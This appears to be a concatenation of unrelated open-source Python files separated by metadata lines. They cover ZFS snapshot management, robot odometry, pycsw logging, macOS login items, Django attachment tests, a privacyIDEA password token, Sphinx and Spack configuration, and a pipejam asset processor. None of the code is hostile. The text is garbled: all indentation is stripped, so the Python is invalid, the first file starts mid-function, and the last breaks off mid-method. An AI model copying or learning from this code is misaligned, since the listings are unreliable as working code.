[zfs_pool + "/" + name], ["name", "guid", "creation"], True, "snapshot"
)
for fullname, props in allprops.items():
# Filter out any subvolume snapshots (these should not generally exist though
# and indicate an administration issue)
if not fullname.startswith(zfs_pool + "/" + name + "@"):
logging.warning(
"found additional subvolumes with snapshots while trying to list snapshots. Please do not"
" create subvolumes underneath targetd managed subvolumes"
)
continue
time_epoch = int(props["creation"])
st = dict(
name=props["name"].replace((zfs_pool + "/" + name + "@"), "", 1),
uuid=props["guid"],
timestamp=time_epoch,
)
snapshots.append(st)
return snapshots
def fs_snapshot(req, pool, name, dest_ss_name):
_check_dataset_name(name)
_check_dataset_name(dest_ss_name)
zfs_pool = pools_fs[pool]
info = snap_info(zfs_pool, name, dest_ss_name)
if info is not None:
raise TargetdError(
TargetdError.EXISTS_FS_NAME,
"Snapshot {0} already exists on pool {1} for {2}".format(
dest_ss_name, pool, name
),
)
code, out, err = _zfs_exec_command(
["snapshot", "{0}/{1}@{2}".format(zfs_pool, name, dest_ss_name)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE, "Could not create snapshot"
)
def fs_snapshot_delete(req, pool, name, ss_name):
_check_dataset_name(name)
_check_dataset_name(ss_name)
zfs_pool = pools_fs[pool]
info = snap_info(zfs_pool, name, ss_name)
if info is None:
return
code, out, err = _zfs_exec_command(
["destroy", "-r", "{0}/{1}@{2}".format(zfs_pool, name, ss_name)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE, "Could not destroy snapshot"
)
def fs_clone(req, pool, name, dest_fs_name, snapshot_name=None):
zfs_pool = pools_fs[pool]
if fs_info(zfs_pool, dest_fs_name) is not None:
raise TargetdError(
TargetdError.EXISTS_CLONE_NAME, "FS already exists with that name (ZFS)"
)
_copy(req, zfs_pool, name, dest_fs_name, None, fs_info, snapshot_name)
def fs_pools(req):
results = []
for pool, zfs_pool in pools_fs.items():
allprops = _zfs_get(
[zfs_pool], ["name", "used", "available"], False, "filesystem"
)
if zfs_pool in allprops:
props = allprops[zfs_pool]
results.append(
dict(
name=pool,
size=(int(props["used"]) + int(props["available"])),
free_size=int(props["available"]),
type="fs",
)
)
return results
| gpl-3.0 | -1,474,268,533,459,330,600 | 29.107607 | 113 | 0.561868 | false |
merose/diff_drive | src/diff_drive/odometry.py | 1 | 2663 | from __future__ import division
from math import pi, sin, cos
from diff_drive.encoder import Encoder
from diff_drive.pose import Pose
class Odometry:
"""Keeps track of the current position and velocity of a
robot using differential drive.
"""
def __init__(self):
self.leftEncoder = Encoder()
self.rightEncoder = Encoder()
self.pose = Pose()
self.lastTime = 0
def setWheelSeparation(self, separation):
self.wheelSeparation = separation
def setTicksPerMeter(self, ticks):
self.ticksPerMeter = ticks
def setEncoderRange(self, low, high):
self.leftEncoder.setRange(low, high)
self.rightEncoder.setRange(low, high)
def setTime(self, newTime):
self.lastTime = newTime
def updateLeftWheel(self, newCount):
self.leftEncoder.update(newCount)
def updateRightWheel(self, newCount):
self.rightEncoder.update(newCount)
def updatePose(self, newTime):
"""Updates the pose based on the accumulated encoder ticks
of the two wheels. See https://chess.eecs.berkeley.edu/eecs149/documentation/differentialDrive.pdf
for details.
"""
leftTravel = self.leftEncoder.getDelta() / self.ticksPerMeter
rightTravel = self.rightEncoder.getDelta() / self.ticksPerMeter
deltaTime = newTime - self.lastTime
deltaTravel = (rightTravel + leftTravel) / 2
deltaTheta = (rightTravel - leftTravel) / self.wheelSeparation
if rightTravel == leftTravel:
deltaX = leftTravel*cos(self.pose.theta)
deltaY = leftTravel*sin(self.pose.theta)
else:
radius = deltaTravel / deltaTheta
# Find the instantaneous center of curvature (ICC).
iccX = self.pose.x - radius*sin(self.pose.theta)
iccY = self.pose.y + radius*cos(self.pose.theta)
deltaX = cos(deltaTheta)*(self.pose.x - iccX) \
- sin(deltaTheta)*(self.pose.y - iccY) \
+ iccX - self.pose.x
deltaY = sin(deltaTheta)*(self.pose.x - iccX) \
+ cos(deltaTheta)*(self.pose.y - iccY) \
+ iccY - self.pose.y
self.pose.x += deltaX
self.pose.y += deltaY
self.pose.theta = (self.pose.theta + deltaTheta) % (2*pi)
self.pose.xVel = deltaTravel / deltaTime if deltaTime > 0 else 0.
self.pose.yVel = 0
self.pose.thetaVel = deltaTheta / deltaTime if deltaTime > 0 else 0.
self.lastTime = newTime
def getPose(self):
return self.pose;
def setPose(self, newPose):
self.pose = newPose
| bsd-3-clause | 5,621,864,774,542,927,000 | 32.708861 | 106 | 0.618475 | false |
PublicaMundi/pycsw | pycsw/log.py | 1 | 3506 | # -*- coding: iso-8859-15 -*-
# =================================================================
#
# Authors: Tom Kralidis <[email protected]>
#
# Copyright (c) 2011 Tom Kralidis
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
LOGGER = logging.getLogger(__name__)
MSG_FORMAT = '%(asctime)s] [%(levelname)s] file=%(pathname)s \
line=%(lineno)s module=%(module)s function=%(funcName)s %(message)s'
TIME_FORMAT = '%a, %d %b %Y %H:%M:%S'
LOGLEVELS = {
'CRITICAL': logging.CRITICAL,
'ERROR': logging.ERROR,
'WARNING': logging.WARNING,
'INFO': logging.INFO,
'DEBUG': logging.DEBUG,
'NOTSET': logging.NOTSET,
}
def setup_logger(config=None):
"""Initialize logging facility"""
if config is None:
return None
# Do not proceed if logging has not been set up.
if not (config.has_option('server', 'loglevel') or
config.has_option('server', 'logfile')):
return None
logfile = None
loglevel = 'NOTSET'
if config.has_option('server', 'loglevel'):
loglevel = config.get('server', 'loglevel')
if loglevel not in LOGLEVELS.keys():
raise RuntimeError(
'Invalid server configuration (server.loglevel).')
if not config.has_option('server', 'logfile'):
raise RuntimeError(
'Invalid server configuration (server.loglevel set,\
but server.logfile missing).')
if config.has_option('server', 'logfile'):
if not config.has_option('server', 'loglevel'):
raise RuntimeError(
'Invalid server configuration (server.logfile set,\
but server.loglevel missing).')
logfile = config.get('server', 'logfile')
if loglevel != 'NOTSET' and logfile is None:
raise RuntimeError(
'Invalid server configuration \
(server.loglevel set, but server.logfile is not).')
# Setup logging globally (not only for the pycsw module)
# based on the parameters passed.
logging.basicConfig(level=LOGLEVELS[loglevel],
filename=logfile,
datefmt=TIME_FORMAT,
format=MSG_FORMAT)
LOGGER.info('Logging initialized (level: %s).' % loglevel)
if loglevel == 'DEBUG': # turn on CGI debugging
LOGGER.info('CGI debugging enabled.')
import cgitb
cgitb.enable()
| mit | -4,502,147,059,277,054,000 | 34.06 | 68 | 0.630918 | false |
pudquick/pyLoginItems | pyLoginItems.py | 1 | 8789 | # /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Headers/LSSharedFileList.h
# Fun things:
# kLSSharedFileListFavoriteItems
# kLSSharedFileListFavoriteVolumes
# kLSSharedFileListRecentApplicationItems
# kLSSharedFileListRecentDocumentItems
# kLSSharedFileListRecentServerItems
# kLSSharedFileListSessionLoginItems
# kLSSharedFileListGlobalLoginItems - deprecated in 10.9
# Runs in user space, use this with a login script / launchd item / something running as the user
# Example usage:
#
# import pyLoginItems
# >>> pyLoginItems.list_login_items()
# [u'/Applications/Dropbox.app', u'/Applications/iTunes.app/Contents/MacOS/iTunesHelper.app']
#
# pyLoginItems.add_login_item('/Applications/Safari.app', 0)
# pyLoginItems.remove_login_item('/Applications/TextEdit.app')
from platform import mac_ver
from Foundation import NSURL
from LaunchServices import kLSSharedFileListSessionLoginItems, kLSSharedFileListNoUserInteraction
# Need to manually load in 10.11.x+
os_vers = int(mac_ver()[0].split('.')[1])
if os_vers > 10:
from Foundation import NSBundle
import objc
SFL_bundle = NSBundle.bundleWithIdentifier_('com.apple.coreservices.SharedFileList')
functions = [('LSSharedFileListCreate', '^{OpaqueLSSharedFileListRef=}^{__CFAllocator=}^{__CFString=}@'),
('LSSharedFileListCopySnapshot', '^{__CFArray=}^{OpaqueLSSharedFileListRef=}o^I'),
('LSSharedFileListItemCopyDisplayName', '^{__CFString=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListItemResolve', 'i^{OpaqueLSSharedFileListItemRef=}Io^^{__CFURL=}o^{FSRef=[80C]}'),
('LSSharedFileListItemMove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListItemRemove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListInsertItemURL', '^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{__CFString=}^{OpaqueIconRef=}^{__CFURL=}^{__CFDictionary=}^{__CFArray=}'),
('kLSSharedFileListItemBeforeFirst', '^{OpaqueLSSharedFileListItemRef=}'),
('kLSSharedFileListItemLast', '^{OpaqueLSSharedFileListItemRef=}'),]
objc.loadBundleFunctions(SFL_bundle, globals(), functions)
else:
from LaunchServices import kLSSharedFileListItemBeforeFirst, kLSSharedFileListItemLast, \
LSSharedFileListCreate, LSSharedFileListCopySnapshot, \
LSSharedFileListItemCopyDisplayName, LSSharedFileListItemResolve, \
LSSharedFileListItemMove, LSSharedFileListItemRemove, \
LSSharedFileListInsertItemURL
def _get_login_items():
# Setup the type of shared list reference we want
list_ref = LSSharedFileListCreate(None, kLSSharedFileListSessionLoginItems, None)
# Get the user's login items - actually returns two values, with the second being a seed value
# indicating when the snapshot was taken (which is safe to ignore here)
login_items,_ = LSSharedFileListCopySnapshot(list_ref, None)
return [list_ref, login_items]
def _get_item_cfurl(an_item, flags=None):
if flags is None:
# Attempt to resolve the items without interacting or mounting
flags = kLSSharedFileListNoUserInteraction + kLSSharedFileListNoUserInteraction
err, a_CFURL, a_FSRef = LSSharedFileListItemResolve(an_item, flags, None, None)
return a_CFURL
def list_login_items():
# Attempt to find the URLs for the items without mounting drives
URLs = []
for an_item in _get_login_items()[1]:
URLs.append(_get_item_cfurl(an_item).path())
return URLs
def remove_login_item(path_to_item):
current_paths = list_login_items()
if path_to_item in current_paths:
list_ref, current_items = _get_login_items()
i = current_paths.index(path_to_item)
target_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, target_item)
def add_login_item(path_to_item, position=-1):
# position:
# 0..N: Attempt to insert at that index position, with 0 being first
# -1: Insert as last item
# Note:
# If the item is already present in the list, it will get moved to the new location automatically.
list_ref, current_items = _get_login_items()
added_item = NSURL.fileURLWithPath_(path_to_item)
if position == 0:
# Seems to be buggy, will force it below
destination_point = kLSSharedFileListItemBeforeFirst
elif position == -1:
destination_point = kLSSharedFileListItemLast
elif position >= len(current_items):
# At or beyond to the end of the current list
position = -1
destination_point = kLSSharedFileListItemLast
else:
# 1 = after item 0, 2 = after item 1, etc.
destination_point = current_items[position - 1]
# The logic for LSSharedFileListInsertItemURL is generally fine when the item is not in the list
# already (with the exception of kLSSharedFileListItemBeforeFirst which appears to be broken, period)
# However, if the item is already in the list, the logic gets really really screwy.
# Your index calculations are invalidated by OS X because you shift an item, possibly shifting the
# indexes of other items in the list.
# It's easier to just remove it first, then re-add it.
current_paths = list_login_items()
if (len(current_items) == 0) or (position == -1):
# Either there's nothing there or it wants to be last
# Just add the item, it'll be fine
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
elif (position == 0):
# Special case - kLSSharedFileListItemBeforeFirst appears broken on (at least) 10.9
# Remove if already in the list
if path_to_item in current_paths:
i = current_paths.index(path_to_item)
old_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, old_item)
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
if (len(current_items) == 0):
# Simple case if nothing remains in the list
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
else:
# At least one item remains.
# The fix for the bug is:
# - Add our item after the first ('needs_fixing') item
# - Move the 'needs_fixing' item to the end
# - Move the 'needs_fixing' item after our added item (which is now first)
needs_fixing = _get_item_cfurl(current_items[0])
# Move our item
result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, added_item, {}, [])
if not (result is None):
# Only shift if the first insert worked
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Now move the old item last
result = LSSharedFileListInsertItemURL(list_ref, kLSSharedFileListItemLast, None, None, needs_fixing, {}, [])
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Now move the old item back under the new one
result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, needs_fixing, {}, [])
else:
# We're aiming for an index based on something else in the list.
# Only do something if we're not aiming at ourselves.
insert_after_path = _get_item_cfurl(destination_point).path()
if (insert_after_path != path_to_item):
# Seems to be a different file
if path_to_item in current_paths:
# Remove our object if it's already present
i = current_paths.index(path_to_item)
self_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, self_item)
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Re-find our original target
current_paths = list_login_items()
i = current_paths.index(insert_after_path)
destination_point = current_items[i]
# Add ourselves after the file
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
| mit | -3,015,296,332,508,749,000 | 53.590062 | 230 | 0.661281 | false |
Anaethelion/django-mapentity | mapentity/tests/test_attachments.py | 1 | 5486 | import mock
from django.test import TestCase, RequestFactory
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from paperclip.models import Attachment, FileType
from mapentity.views.generic import MapEntityDetail
from .models import DummyModel
User = get_user_model()
def add_url_for_obj(obj):
return reverse('add_attachment', kwargs={
'app_label': obj._meta.app_label,
'module_name': obj._meta.module_name,
'pk': obj.pk
})
class EntityAttachmentTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user('howard', '[email protected]', 'booh')
def user_perms(p):
return {'paperclip.add_attachment': False}.get(p, True)
self.user.is_anonymous = mock.MagicMock(return_value=False)
self.user.has_perm = mock.MagicMock(side_effect=user_perms)
self.object = DummyModel.objects.create()
def createRequest(self):
request = RequestFactory().get('/dummy')
request.session = {}
request.user = self.user
return request
def createAttachment(self, obj):
uploaded = SimpleUploadedFile('file.odt',
'*' * 128,
content_type='application/vnd.oasis.opendocument.text')
kwargs = {
'content_type': ContentType.objects.get_for_model(obj),
'object_id': obj.pk,
'filetype': FileType.objects.create(),
'creator': self.user,
'title': "Attachment title",
'legend': "Attachment legend",
'attachment_file': uploaded
}
return Attachment.objects.create(**kwargs)
def test_list_attachments_in_details(self):
self.createAttachment(self.object)
request = self.createRequest()
view = MapEntityDetail.as_view(model=DummyModel,
template_name="mapentity/mapentity_detail.html")
response = view(request, pk=self.object.pk)
html = unicode(response.render())
self.assertTemplateUsed(response, template_name='paperclip/attachment_list.html')
self.assertEqual(1, len(Attachment.objects.attachments_for_object(self.object)))
self.assertNotIn("Submit attachment", html)
for attachment in Attachment.objects.attachments_for_object(self.object):
self.assertIn(attachment.legend, html)
self.assertIn(attachment.title, html)
self.assertIn(attachment.attachment_file.url, html)
self.assertIn('paperclip/fileicons/odt.png', html)
def test_upload_form_in_details_if_perms(self):
self.user.has_perm = mock.MagicMock(return_value=True)
view = MapEntityDetail.as_view(model=DummyModel,
template_name="mapentity/mapentity_detail.html")
request = self.createRequest()
response = view(request, pk=self.object.pk)
html = unicode(response.render())
self.assertIn("Submit attachment", html)
self.assertIn("""<form action="/paperclip/add-for/tests/dummymodel/1/""", html)
class UploadAttachmentTestCase(TestCase):
def setUp(self):
self.object = DummyModel.objects.create()
user = User.objects.create_user('aah', '[email protected]', 'booh')
user.is_superuser = True
user.save()
success = self.client.login(username=user.username, password='booh')
self.assertTrue(success)
def attachmentPostData(self):
filetype = FileType.objects.create()
uploaded = SimpleUploadedFile('face.jpg',
'*' * 128,
content_type='image/jpeg')
data = {
'filetype': filetype.pk,
'title': 'A title',
'legend': 'A legend',
'attachment_file': uploaded,
'next': self.object.get_detail_url()
}
return data
def test_upload_redirects_to_dummy_detail_url(self):
response = self.client.post(add_url_for_obj(self.object),
data=self.attachmentPostData())
self.assertEqual(response.status_code, 302)
self.assertEqual(response['location'],
'http://testserver/dummymodel/%s/' % self.object.pk)
def test_upload_creates_attachment(self):
data = self.attachmentPostData()
self.client.post(add_url_for_obj(self.object), data=data)
att = Attachment.objects.attachments_for_object(self.object).get()
self.assertEqual(att.title, data['title'])
self.assertEqual(att.legend, data['legend'])
self.assertEqual(att.filetype.pk, data['filetype'])
def test_title_gives_name_to_file(self):
data = self.attachmentPostData()
self.client.post(add_url_for_obj(self.object), data=data)
att = Attachment.objects.attachments_for_object(self.object).get()
self.assertTrue('a-title' in att.attachment_file.name)
def test_filename_is_used_if_no_title(self):
data = self.attachmentPostData()
data['title'] = ''
self.client.post(add_url_for_obj(self.object), data=data)
att = Attachment.objects.attachments_for_object(self.object).get()
self.assertTrue('face' in att.attachment_file.name)
| bsd-3-clause | 8,546,535,563,439,139,000 | 38.753623 | 93 | 0.623223 | false |
jalr/privacyidea | privacyidea/lib/tokens/passwordtoken.py | 1 | 4231 | # -*- coding: utf-8 -*-
#
# privacyIDEA is a fork of LinOTP
# 2014-12-05 Cornelius Kölbel <[email protected]>
# Migration to flask
#
# May 08, 2014 Cornelius Kölbel
# License: AGPLv3
# contact: http://www.privacyidea.org
#
# Copyright (C) 2010 - 2014 LSE Leading Security Experts GmbH
# License: LSE
# contact: http://www.linotp.org
# http://www.lsexperts.de
# [email protected]
"""
This file contains the definition of the password token class
"""
import logging
from privacyidea.lib.crypto import zerome
from privacyidea.lib.tokenclass import TokenClass
from privacyidea.lib.log import log_with
from privacyidea.lib.decorators import check_token_locked
optional = True
required = False
log = logging.getLogger(__name__)
class PasswordTokenClass(TokenClass):
"""
This Token does use a fixed Password as the OTP value.
In addition, the OTP PIN can be used with this token.
This Token can be used for a scenario like losttoken
"""
class SecretPassword(object):
def __init__(self, secObj):
self.secretObject = secObj
def get_password(self):
return self.secretObject.getKey()
def check_password(self, password):
res = -1
key = self.secretObject.getKey()
if key == password:
res = 0
zerome(key)
del key
return res
def __init__(self, aToken):
TokenClass.__init__(self, aToken)
self.hKeyRequired = True
self.set_type(u"pw")
@staticmethod
def get_class_type():
return "pw"
@staticmethod
def get_class_prefix():
return "PW"
@staticmethod
@log_with(log)
def get_class_info(key=None, ret='all'):
"""
returns a subtree of the token definition
:param key: subsection identifier
:type key: string
:param ret: default return value, if nothing is found
:type ret: user defined
:return: subsection if key exists or user defined
:rtype: dict or scalar
"""
res = {'type': 'pw',
'title': 'Password Token',
'description': ('A token with a fixed password. Can be '
'combined with the OTP PIN. Is used for the '
'lost token scenario.'),
'init': {},
'config': {},
'user': [],
# This tokentype is enrollable in the UI for...
'ui_enroll': [],
'policy': {},
}
# I don't think we need to define the lost token policies here...
if key is not None and key in res:
ret = res.get(key)
else:
if ret == 'all':
ret = res
return ret
def update(self, param):
"""
This method is called during the initialization process.
:param param: parameters from the token init
:type param: dict
:return: None
"""
"""
:param param:
:return:
"""
TokenClass.update(self, param)
self.set_otplen()
@log_with(log)
@check_token_locked
def set_otplen(self, otplen=0):
"""
sets the OTP length to the length of the password
:param otplen: This is ignored in this class
:type otplen: int
:result: None
"""
secretHOtp = self.token.get_otpkey()
sp = PasswordTokenClass.SecretPassword(secretHOtp)
pw_len = len(sp.get_password())
TokenClass.set_otplen(self, pw_len)
return
@log_with(log, log_entry=False)
@check_token_locked
def check_otp(self, anOtpVal, counter=None, window=None, options=None):
"""
This checks the static password
:param anOtpVal: This contains the "OTP" value, which is the static
password
:return: result of password check, 0 in case of success, -1 if fail
:rtype: int
"""
secretHOtp = self.token.get_otpkey()
sp = PasswordTokenClass.SecretPassword(secretHOtp)
res = sp.check_password(anOtpVal)
return res
| agpl-3.0 | -5,484,447,843,256,674,000 | 26.640523 | 77 | 0.568456 | false |
AlekhyaMallina-Vedams/openstack-manuals | doc/common/source/conf.py | 1 | 4284 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
# import sys
import openstackdocstheme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# TODO(ajaeger): enable PDF building, for example add 'rst2pdf.pdfbuilder'
extensions = []
# Add any paths that contain templates here, relative to this directory.
# templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Common documents'
bug_tag = u'common'
copyright = u'2015-2016, OpenStack contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# A few variables have to be set for the log-a-bug feature.
# giturl: The location of conf.py on Git. Must be set manually.
# gitsha: The SHA checksum of the bug description. Automatically extracted from git log.
# bug_tag: Tag for categorizing the bug. Must be set manually.
# These variables are passed to the logabug code via html_context.
giturl = u'http://git.openstack.org/cgit/openstack/openstack-manuals/tree/doc/common/source'
git_cmd = "/usr/bin/git log | head -n1 | cut -f2 -d' '"
gitsha = os.popen(git_cmd).read().strip('\n')
html_context = {"gitsha": gitsha, "bug_tag": bug_tag,
"giturl": giturl}
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for Internationalization output ------------------------------
locale_dirs = ['locale/']
| apache-2.0 | 622,890,007,791,508,100 | 34.114754 | 92 | 0.721522 | false |
skosukhin/spack | var/spack/repos/builtin/packages/vizglow/package.py | 1 | 4498 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import glob
import os
class Vizglow(Package):
"""VizGlow software tool is used for high-fidelity multi-dimensional
modeling of non-equilibrium plasma discharges.
Note: VizGlow is licensed software. You will need to create an account on
the EsgeeTech homepage and download VizGlow yourself. Spack will search
your current directory for a file of this format. Alternatively, add this
file to a mirror so that Spack can find it. For instructions on how to
set up a mirror, see http://spack.readthedocs.io/en/latest/mirrors.html"""
homepage = "http://esgeetech.com/products/vizglow-plasma-modeling/"
version('2.2alpha20', '2bef890c66f3a44aaf96f7c96788c89e', expand=False,
url="file://{0}/VizGlow_v2.2alpha20-Linux-x86_64-R09December2016-Install".format(os.getcwd()))
version('2.2alpha17', '1de268564363e0ee86f9ffff1c3b82e1', expand=False,
url="file://{0}/VizGlow_v2.2alpha17-R21November2016-Linux-x86_64-Install".format(os.getcwd()))
version('2.2alpha15', 'be2b5044f30f2b2c3bbe87a0037bf228', expand=False,
url="file://{0}/VizGlow_v2.2alpha15-Linux-x86_64-R31October2016-Install".format(os.getcwd()))
# depends_on('mesa') # TODO: mesa build doesn't work for me
depends_on('zlib')
depends_on('freetype')
depends_on('fontconfig')
depends_on('libxrender')
depends_on('xterm')
# Can't get mozjs to build, packagekit -> polkit -> mozjs
# depends_on('packagekit+gtk')
depends_on('libcanberra+gtk')
# Licensing
license_required = True
license_comment = '#'
license_files = ['esgeelm.lic']
license_vars = ['ESGEE_LICENSE_FILE']
def configure(self, prefix):
# Dictionary of responses
responses = {
'CreateDesktopShortcut': 'No',
'CreateQuickLaunchShortcut': 'No',
'InstallDir': prefix
}
# Write response file
with open('spack-responses.txt', 'w') as response_file:
for key in responses:
response_file.write('{0}: {1}\n'.format(key, responses[key]))
def install(self, spec, prefix):
self.configure(prefix)
installer = glob.glob('VizGlow*Install')[0]
chmod = which('chmod')
chmod('+x', installer)
installer = Executable(installer)
installer('--mode', 'silent', '--response-file', 'spack-responses.txt')
self.filter_ld_library_path(spec, prefix)
def filter_ld_library_path(self, spec, prefix):
"""Run after install to inject dependencies into LD_LIBRARY_PATH.
If we don't do this, the run files will clear the LD_LIBRARY_PATH.
Since the installer is a binary file, we have no means of specifying
an RPATH to use."""
files = glob.glob(prefix + '/binaries/*.run')
ld_library_path = ':'.join([
spec['zlib'].prefix.lib,
spec['freetype'].prefix.lib,
spec['fontconfig'].prefix.lib,
spec['libxrender'].prefix.lib,
spec['libcanberra'].prefix.lib
])
for runfile in files:
filter_file('(export LD_LIBRARY_PATH=)$',
r'\1{0}'.format(ld_library_path),
runfile)
| lgpl-2.1 | -3,512,128,012,529,714,700 | 39.522523 | 106 | 0.642952 | false |
ariovistus/django-pipejam | pipejam/processors.py | 1 | 3467 |
from importlib import import_module
from toposort import toposort_flatten
import os.path
from django.conf import settings
from django.utils.html import escape
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.core.exceptions import ImproperlyConfigured
from django.template.loader import render_to_string
from django.template import Context
class Processor(object):
def __init__(self, config):
self.config = config
def _lookup_namespace_config(namespace):
return getattr(settings, 'PIPELINE_' + namespace.upper(), {})
class AssetRegistry(object):
def __init__(self):
self.processor_config = getattr(settings,'PIPEJAM_PROCESSORS')
self.namespaces = self.processor_config.keys()
self.config = dict([(nm, _lookup_namespace_config(nm)) for nm in self.namespaces])
self.assets = dict([(nm, dict()) for nm in self.namespaces])
def _lookup_bundle(self, bundlename):
for namespace, config in self.config.items():
if bundlename in config:
yield (bundlename, namespace)
def _load_deps(self, bundlename, namespace):
if not namespace:
for bundlename1, namespace1 in self._lookup_bundle(bundlename):
self._load_deps(bundlename, namespace1)
else:
if bundlename not in self.assets[namespace]:
bundleconfig = self.config[namespace][bundlename];
deps = set()
for dep0 in bundleconfig.get('deps', []):
if isinstance(dep0, tuple):
deps.add(dep0)
else:
for dep in self._lookup_bundle(dep0):
deps.add(dep)
self.assets[namespace][bundlename] = set(dep for dep in deps if dep[1] == namespace)
for bundlename1, namespace1 in deps:
self._load_deps(bundlename1, namespace1)
def add_asset_reference(self, bundlename, namespace=None):
self._load_deps(bundlename, namespace)
def mode_for_file(self, filename):
_, ext = os.path.splitext(filename)
mode = ext.lstrip('.')
return self.mode_map.get(mode, mode)
def get_processor(self, namespace):
config = self.processor_config[namespace]
mod, cls = config['processor'].rsplit('.', 1)
module = import_module(mod)
return getattr(module, cls)(config)
def render(self, context, namespace):
result = []
asset_map = dict((key, set(str(value[0]) for value in depset)) for (key,depset) in self.assets[namespace].items())
assets = toposort_flatten(asset_map)
processor = self.get_processor(namespace)
for asset in assets:
result.extend(processor.render(context, asset, self.config[namespace][asset], self.processor_config[namespace]))
return result
#
# Default processors
#
class PipelineScriptProcessor(Processor):
def render(self, context, bundlename, config, processor_config):
from pipeline.templatetags.compressed import CompressedJSNode
